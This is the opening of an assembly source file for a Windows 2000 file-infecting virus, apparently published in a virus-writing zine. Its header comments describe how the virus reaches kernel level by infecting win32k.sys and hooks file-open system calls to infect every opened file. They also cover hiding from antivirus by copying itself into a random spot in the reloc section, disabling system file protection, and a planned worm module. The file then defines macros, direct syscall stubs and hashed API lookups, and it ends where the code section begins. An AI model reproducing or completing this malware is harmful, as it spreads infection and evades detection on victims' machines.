29a-7.006
;win2k.CannaByte.v2 coded by (Super && vallez)
;
;IMPORTANT: THIS CODE IS ONLY FOR READING AND, IF YOU WANT, TESTING. I AM NOT RESPONSIBLE IF YOU
;USE IT FOR BAD THINGS. IN ADDITION, AS IT STANDS THE VIRUS WILL INFECT WIN32K.SYS AND HOOK
;THE APIS, BUT IT WILL ONLY INFECT THE FILE ZZZ.EXE, SO IT MUST BE MODIFIED TO WORK FULLY.
;
;When an infected file arrives on a system, it will infect that system.
;The spreading method is to intercept NtCreateFile and NtOpenFile in the SSDT
;and infect every file that gets opened.
;For that purpose the virus tries to reach ring0 and intercept the system calls there.
;To reach ring0 the virus infects win32k.sys, so on the next restart the virus
;is loaded in ring0.
;I will not explain much more here because the virus is heavily commented and so easily
;understandable.
;version 2 improvements:
;
;Checksum of win32k.sys calculated on the fly, without using APIs.
;
;RING0 EPO infection:
;
; The virus infects in this manner: it copies itself into the reloc section; however,
; it takes the RVA of the relocs and adds a random offset to that RVA. In addition, the
; reloc pointer is erased from the data directory. AVs cannot start their search
; from a fixed part of the PE, because the virus may have been copied to any section and
; any offset within that section. In addition, the vx infects using EPO:
; The virus searches for the code section containing the entrypoint and calculates a random
; offset from the start of that section. The offset may land between instructions, without
; pointing at a valid opcode. Here Super's theory comes in:
;
; Super's Theory:
;
; When you jump a random number of bytes into a buffer of code, it is possible you
; land in a zone between instructions. For example, given E8 11 22 33 44, a random jump
; may leave you pointing at the 11 or the 22 instead of the instruction opcode E8.
; But it is possible to steer your pointer back onto opcodes by walking over the code,
; getting instruction lengths and adding them to your pointer, 16 times at most.
; Then you will be on opcodes for sure.
;
; The theory was fully tested and it works perfectly...x86 secrets :)
;
; Well, using the theory we can steer our pointer to a valid opcode. From that
; opcode we search for a call, E8 XX XX XX XX, and hook that call to
; give control to the vx.
;
; This method can be very powerful: AVs cannot search for the vx at a fixed offset,
; and they cannot search for the call at a fixed offset. They cannot start searching
; for the vx from the end of the file, because the virus may be far from there.
; In big hosts they need to read a lot of bytes of the host to find the vx.
;
; We are using the length disassembler engine (lde32) by Z0mbie :) We love your engine.
;
;
; Problems with EPO: we copy the vx to an offset from the start of the relocs. The previous
; version infected more files, since it had more space for infection. Now more files
; are discarded. However, infected files are more difficult to detect.
;
;
;Other improvements we would like to add with more time:
;
; Worm support: today the internet is the battlefield for vx. Well, this is my opinion:
; infector viruses are powerful because they are more difficult to detect, above all
; if they use methods such as EPO, poly/metamorphism, cavity... and other powerful
; techniques. However, the internet is succulent for viruses, and a good virus must have
; internet support. A very powerful virus would have to combine both things: a
; good infection method, making detection difficult, and a fast spreading method using
; the internet. We want to add a worm part:
; The worm part would run in ring3, sending random files from the infected machine. These
; files would be infected by the hook in the ring0 vx part.
;
; Sfc disabling: the virus is now able to disable sfc in win2k using the Benny and Ratter
; method. It would be interesting to add new methods for disabling sfc on all systems,
; preferably without string searching for the patching. I am sure new, more generic
; methods will appear in the next zine, so it would be interesting to add them.
;
; Full stealth in memory and on disk: we are in ring0 hooking NtCreateFile and NtOpenFile...
; why not full stealth on disk for win32k.sys? No time now.. :( In the same manner
; we would like to add full stealth in memory.
;
;
;THX TO:
;
;-As always Xezaw :) my dear m3nt0r ;) (THE BEST m3nt0r) I must say u thx coz that lot of
;patience that u had haven with me :) im a "ceporro" (i dont know how to say this in
;english xDD)
;-My second dear m3nt0r :) Super. How its possible u know all things i ask u? O_O xDD
;-VirusBust :) a good friend who helped me a lot of too.
;-Morphine: the most likeable girl in the undernet :D and in the world too! ;D i adore to
;speak with u :)
;Remains, ring0 machine :)
;-Pato,Nigthmare,isotope,ViR[-_-],MrHangman,Oyzzo,bi0s,... My best friends :)
;-Nmt,ur articles have helped me lot of :)
;-GriYo who always helped me too a lot of :) when i have needed.
;-Ratter&Benny: i dont know u but i must say ur articles and virus codes have helped me
;lot of very much.(When i added this line in parenthesys i already knew ratter and i must
;say thx again for ur help ;)
;-Z0mbie: ur engine is a boom!! :D
;-Well,"THX TO" part is the more difficult part to code coz always u will forget to thx
;somebody so i must say thx all people that i forget to put here :)
;-And OfCorz a infinitely BIG THX TO 'Lady Marian' :********************* U r resident
;in my memory all time :D
.586p
.model flat,stdcall
extrn ExitProcess:proc
extrn GetLastError:proc
extrn GetModuleHandleA:proc
;29a files
include mz.inc
include pe.inc
include win32api.inc
include useful.inc
;macros
;;;;;;;;;;;;;;;;;;;;;;;
callz macro dir_call                ;relative call emitted as raw bytes
    db 0E8h
    dd (dir_call - $ - 4)
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
jmpz macro dir_call                 ;relative jmp emitted as raw bytes
    db 0E9h
    dd (dir_call - $ - 4)
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
CalcLenString macro                 ;length of the zero-terminated string at esi -> ecx
    local loopin
    push esi
    dec esi
loopin:
    inc esi
    cmp byte ptr [esi],0
    jne loopin
    mov ecx,esi
    pop esi
    sub ecx,esi
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
GezApi macro BaseKernel,ApiCRC,ApiNameLen   ;resolve an export by name CRC -> eax
    mov eax,BaseKernel
    mov edx,ApiCRC
    mov ebx,ApiNameLen
    callz GetApi
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
GezSyscall macro BaseNtdll,ApiCRC,ApiNameLen ;service number from the 'mov eax,imm32' of the ntdll stub
    GezApi BaseNtdll,ApiCRC,ApiNameLen
    mov eax,[eax + 1]
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
syscallz macro fc,paramz            ;from Ratter's win2k.Joss: edx -> arguments on the stack
    mov eax,fc
    lea edx,[esp]
    int 2eh
    add esp,(paramz*4)
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
Writez macro BaseKernel,hProcess,OffsetInProc,Buffer,Size
    push 0
    mov [esp],esp                   ;for storing the number of written bytes
    push Size
    push Buffer
    push OffsetInProc
    push hProcess
    GezApi BaseKernel,WriteMemoryProcessCRC,WMPNameLen
    call eax
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
Readz macro BaseKernel,hProcess,OffsetInProc,Buffer,Size
    push 0
    mov [esp],esp                   ;for storing the number of read bytes
    push Size
    push Buffer
    push OffsetInProc
    push hProcess
    GezApi BaseKernel,ReadMemoryProcessCRC,RMPNameLen
    call eax
endm
;;;;;;;;;;;;;;;;;;;;;;;
;API NAME CRCS AND LENGTHS
LoadLibraryACRC equ 3fc1bd8dh
LLNameLen equ 12
CloseHandleCRC equ 0b09315f4h
CHNameLen equ 11
FindFirstFileACRC equ 0c9ebd5ceh
FFFNameLen equ 14
FindNextFileACRC equ 75272948h
FNFNameLen equ 13
FindCloseCRC equ 0d82bf69ah
FCNameLen equ 9
GetTickCountCRC equ 5b4219f8h
GTCNameLen equ 12
WriteMemoryProcessCRC equ 4f58972eh
WMPNameLen equ 18
ReadMemoryProcessCRC equ 0f7c7ae42h
RMPNameLen equ 17
ResumeThreadCRC equ 3872beb9h
RTNameLen equ 12
ExitProcessCRC equ 251097CCh
EPNameLen equ 11
SetFileAttributesACRC equ 156b9702h
SFANameLen equ 18
CreateFileACRC equ 553b5c78h
CFNameLen equ 11
CreateFileMappingACRC equ 0b41b926ch
CFMNameLen equ 18
MapViewOfFileCRC equ 0A89b382fh
MVFNameLen equ 13
UnmapViewOfFileCRC equ 391ab6afh
UVFNameLen equ 15
SetFileTimeCRC equ 21804a03h
SFTNameLen equ 11
GetModuleHandleACRC equ 0B1866570h
GMHNameLen equ 16
GetLastErrorCRC equ 0d2e536b7h
GLENameLen equ 12
RegisterServiceProcessCRC equ 3b5ef61fh
RSPNameLen equ 22
SetCurrentDirectoryACRC equ 69b6849fh
SCDNameLen equ 20
GetCurrentDirectoryACRC equ 0c79dc4e3h
GCDNameLen equ 20
GetWindowsDirectoryACRC equ 0fff372beh
GWDNameLen equ 20
GetModuleFileNameACRC equ 08bff7a0h
GMFNNameLen equ 18
CreateProcessACRC equ 0a851d916h
CPNameLen equ 14
Module32FirstCRC equ 38891c00h
M32FNameLen equ 13
Module32NextCRC equ 0f6911852h
M32NNameLen equ 12
CreateToolhelp32SnapShotCRC equ 0c1f3b876h
CT32SNameLen equ 24
VirtualProtectExCRC equ 5d180413h
VPNameLen equ 16
GetCurrentProcessCRC equ 0d0861aa4h
GCPNameLen equ 17
OpenProcessTokenCRC equ 0f9c60615h
OPTNameLen equ 16
LookupPrivilegeValueACRC equ 0da87bf62h
LPVNameLen equ 21
AdjustTokenPrivilegesCRC equ 0de3e5cfh
ATPNameLen equ 21
EnumProcessesCRC equ 0509a21ch
EPSNameLen equ 13
EnumProcessModulesCRC equ 0dea82ac2h
EPMNameLen equ 18
GetModuleInformationCRC equ 0f2a84636h
GMINameLen equ 20
SuspendThreadCRC equ 0bd76ac31h
STNameLen equ 13
FreeLibraryCRC equ 0da68238fh
FLNameLen equ 11
GetVersionCRC equ 4ccf1a0fh
GVNameLen equ 10
RasDialACRC equ 0b88da156h
RDNameLen equ 8
GetModuleBaseNameACRC equ 1720513eh
GMBNNameLen equ 18
OpenProcessCRC equ 0df27514bh
OPNameLen equ 11
ZwConnectPortCRC equ 0cbaec255h
ZCPNameLen equ 13
NtConnectPortCRC equ 0c88edce9h
NCPNameLen equ 13
ZwRequestPortCRC equ 0e28aebd1h
ZRPNameLen equ 13
DbgUiConnectToDbgCRC equ 09a51ac3ah
DUCTDNameLen equ 17
DbgSsInitializeCRC equ 0d198b351h
DSINameLen equ 15
DbgSsHandleKmApiMsgCRC equ 2e9c4e99h
DSHKAMNameLen equ 19
GetCurrentProcessIdCRC equ 1db413e3h
GCPINameLen equ 19
GetCurrentThreadIdCRC equ 8df87e63h
GCTINameLen equ 18
WaitForDebugEventCRC equ 96ab83a1h
WFDENameLen equ 17
ContinueDebugEventCRC equ 0d8e77e49h
CDENameLen equ 18
VirtualAllocExCRC equ 0e62e824dh
VANameLen equ 14
CreateRemoteThreadCRC equ 0ff808c10h
CRTNameLen equ 18
NtTerminateProcessCRC equ 94fcb0c0h
NTPNameLen equ 18
ExitThreadCRC equ 80af62e1h
ETNameLen equ 10
GetCurrentDirectoryWCRC equ 334971b2h
GCDWNameLen equ 20
FindFirstFileWCRC equ 3d3f609fh
FFFWNameLen equ 14
SleepCRC equ 0cef2eda8h
SNameLen equ 5
MoveFileACRC equ 0de9ff0d1h
MFNameLen equ 9
MapFileAndCheckSumACRC equ 462eeff7h
MFACSNameLen equ 19
CheckSumMappedFileCRC equ 0bbb4966eh
CSMFNameLen equ 18
CopyFileACRC equ 0199dc99h
CpFNameLen equ 9
KeServiceDescriptorTableCRC equ 32a4d557h
KSDTNameLen equ 24
NtCreateFileCRC equ 3ee6cc56h
NCFNameLen equ 12
ZwOpenFileCRC equ 0b679c176h
ZOFNameLen equ 10
ZwOpenSectionCRC equ 73bdfd70h
ZOSNameLen equ 13
ZwMapViewOfSectionCRC equ 0d287ee26h
ZMVOSNameLen equ 18
ZwCloseCRC equ 180c0d23h
ZCNameLen equ 7
ZwCreateSectionCRC equ 2c919477h
ZCSNameLen equ 15
ZwUnmapViewOfSectionCRC equ 9d35f923h
ZUVOSNameLen equ 20
NtOpenFileCRC equ 0a1b1dc21h
NOFNameLen equ 10
ZwDeleteFileCRC equ 6967772dh
ZDFNameLen equ 12
DeleteFileACRC equ 919b6bcbh
DFNameLen equ 11
ZwCreateFileCRC equ 0a81a7cd4h
ZCFNameLen equ 12
PsCreateSystemThreadCRC equ 32adfc3ah
PCSTNameLen equ 20
KeQueryTickCountCRC equ 52d6480eh
KQTCNameLen equ 16
Kernel32CRC equ 204c64e5h ;CRC of 'kernel32' string
TOKEN_PRIVILEGES struc
TP_count dd ?
TP_luid dq ?
TP_attribz dd ?
TOKEN_PRIVILEGES ends
unicode_string struc
us_Length dw ?
us_MaximumLength dw ?
us_Buffer dd ?
unicode_string ends
objects_attributes struc
oa_length dd ? ;length of this structure
oa_rootdir dd ?
oa_objectname dd ? ;name of the object
oa_attribz dd ? ;attributes of the object
oa_secdesc dd ?
oa_secqos dd ?
objects_attributes ends
pio_status struc
ps_ntstatus dd ?
ps_info dd ?
pio_status ends
TOKEN_ASSIGN_PRIMARY equ 00000001h
TOKEN_DUPLICATE equ 00000002h
TOKEN_IMPERSONATE equ 00000004h
TOKEN_QUERY equ 00000008h
TOKEN_QUERY_SOURCE equ 00000010h
TOKEN_ADJUST_PRIVILEGES equ 00000020h
TOKEN_ADJUST_GROUPS equ 00000040h
TOKEN_ADJUST_DEFAULT equ 00000080h
TOKEN_ALL_ACCESS equ STANDARD_RIGHTS_REQUIRED or \
TOKEN_ASSIGN_PRIMARY or \
TOKEN_DUPLICATE or \
TOKEN_IMPERSONATE or \
TOKEN_QUERY or \
TOKEN_QUERY_SOURCE or \
TOKEN_ADJUST_PRIVILEGES or \
TOKEN_ADJUST_GROUPS or \
TOKEN_ADJUST_DEFAULT
SE_PRIVILEGE_ENABLED equ 00000002h
CHECKSUM_SUCCESS equ 00000000h
CHECKSUM_OPEN_FAILURE equ 00000001h
CHECKSUM_MAP_FAILURE equ 00000002h
CHECKSUM_MAPVIEW_FAILURE equ 00000003h
CHECKSUM_UNICODE_FAILURE equ 00000004h
OBJ_CASE_INSENSITIVE equ 00000040h
FILE_DIRECTORY_FILE equ 00000001h
FILE_WRITE_THROUGH equ 00000002h
FILE_SEQUENTIAL_ONLY equ 00000004h
FILE_NO_INTERMEDIATE_BUFFERING equ 00000008h
FILE_SYNCHRONOUS_IO_ALERT equ 00000010h
FILE_SYNCHRONOUS_IO_NONALERT equ 00000020h
FILE_NON_DIRECTORY_FILE equ 00000040h
FILE_CREATE_TREE_CONNECTION equ 00000080h
FILE_COMPLETE_IF_OPLOCKED equ 00000100h
FILE_NO_EA_KNOWLEDGE equ 00000200h
FILE_OPEN_FOR_RECOVERY equ 00000400h
FILE_RANDOM_ACCESS equ 00000800h
FILE_DELETE_ON_CLOSE equ 00001000h
FILE_OPEN_BY_FILE_ID equ 00002000h
FILE_OPEN_FOR_BACKUP_INTENT equ 00004000h
FILE_NO_COMPRESSION equ 00008000h
FILE_RESERVE_OPFILTER equ 00100000h
FILE_OPEN_REPARSE_POINT equ 00200000h
FILE_OPEN_NO_RECALL equ 00400000h
FILE_OPEN_FOR_FREE_SPACE_QUERY equ 00800000h
FILE_COPY_STRUCTURED_STORAGE equ 00000041h
FILE_STRUCTURED_STORAGE equ 00000441h
FILE_VALID_OPTION_FLAGS equ 00ffffffh
FILE_VALID_PIPE_OPTION_FLAGS equ 00000032h
FILE_VALID_MAILSLOT_OPTION_FLAGS equ 00000032h
FILE_VALID_SET_FLAGS equ 00000036h
FILE_SHARE_READ equ 00000001h
FILE_SHARE_WRITE equ 00000002h
FILE_READ_DATA equ 00000001h
FILE_WRITE_DATA equ 00000002h
FILE_APPEND_DATA equ 00000004h
FILE_OPEN_IF equ 00000003h
FILE_OPEN equ 00000001h
STATUS_SUCCESS equ 00000000h
SEC_COMMIT equ 08000000h
SECTION_QUERY equ 00000001h
SECTION_MAP_WRITE equ 00000002h
SECTION_MAP_READ equ 00000004h
SECTION_MAP_EXECUTE equ 00000008h
SECTION_EXTEND_SIZE equ 00000010h
STANDART_RIGTHS_REQUIRED equ 000F0000h
SYNCHRONIZE equ 00100000h
THREAD_ALL_ACCESS equ (STANDARD_RIGHTS_REQUIRED + SYNCHRONIZE + 3FFh)
STARTUPINFOSIZE equ 68
PROCESSINFORMATIONSIZE equ 16
cPushfd equ 4
tamvirus = evirus - svirus
.data
;;;;;;
az db 'KeQueryTickCount',0
azz db 'WriteProfileStringA',0
vallez db 'vallez for 29a',0
.code